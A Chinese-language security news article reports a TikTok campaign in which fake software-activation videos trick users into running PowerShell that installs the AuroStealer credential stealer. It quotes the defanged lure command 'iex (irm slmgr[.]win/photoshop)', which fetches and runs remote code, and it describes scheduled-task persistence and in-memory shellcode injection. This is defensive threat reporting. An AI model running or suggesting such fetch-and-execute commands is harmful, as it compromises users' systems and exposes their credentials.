黑客利用TikTok视频部署自编译恶意软件,并利用PowerShell执行

2025-10-18 20:30:24 0 63

网络犯罪分子正在利用 TikTok 庞大的用户群来传播复杂的恶意软件活动,这些活动承诺免费激活软件,但却传递危险的有效载荷。 此次攻击利用了类似 ClickFix 技术的社会工程策略,毫无戒心的用户被诱骗在其系统上执行恶意的 PowerShell 命令。 受害者会遇到 TikTok 视频,其中提供免费激活Photoshop等流行软件,其中一个视频在被发现之前已获得超过 500 个赞。 当用户按照说明以管理员权限打开 PowerShell 并执行看似简单的单行命令时,攻击链就开始了。

网络犯罪分子正在利用 TikTok 庞大的用户群来传播复杂的恶意软件活动,这些活动承诺免费激活软件,但却传递危险的有效载荷。

此次攻击利用了类似 ClickFix 技术的社会工程策略,毫无戒心的用户被诱骗在其系统上执行恶意的 PowerShell 命令。

受害者会遇到 TikTok 视频,其中提供免费激活Photoshop等流行软件,其中一个视频在被发现之前已获得超过 500 个赞。

当用户按照说明以管理员权限打开 PowerShell 并执行看似简单的单行命令时,攻击链就开始了。

初始感染媒介指示受害者运行命令,该命令从远程服务器iex (irm slmgr[.]win/photoshop)获取并执行恶意PowerShell 代码。

该第一阶段有效载荷(SHA256:6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23)的 VirusTotal 检测率达到 17/63,证明了其规避能力。

该脚本从 hxxps://file-epq[.]pages[.]dev/updater.exe 下载一个名为 updater.exe 的辅助可执行文件,分析显示该可执行文件是 AuroStealer 恶意软件,旨在收集敏感凭证和系统信息。

互联网风暴中心的研究人员发现了这一活动,并发现持久性机制是通过伪装成合法系统进程的计划任务来实现的。

该恶意软件随机选择任务名称(例如“MicrosoftEdgeUpdateTaskMachineCore”)与正版 Windows 服务混合,确保每次用户登录时执行。

第三个有效载荷名为 source.exe(SHA256:db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011),它通过在运行时使用位于的 .NET Framework 编译器按需编译 C# 代码,引入了一种高级规避技术C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe。

自编译技术和内存注入
自编译能力代表了一种逃避传统检测机制的复杂方法。

该恶意软件在执行期间编译一个 C# 类,该类导入 kernel32.dll 函数,包括 VirtualAlloc、CreateThread 和 WaitForSingleObject。

该动态编译的代码分配可执行内存空间,将 shellcode 直接注入进程内存,并创建一个新线程来执行恶意负载,而无需将其他文件写入磁盘。

研究人员在 TikTok 上发现了该攻击活动的多种变体,针对的是搜索各种软件应用程序破解版本的用户,这凸显了避免从不受信任的来源下载软件的重要性。

关于作者

socsoc13篇文章33篇回复

评论0次

要评论?请先  登录  或  注册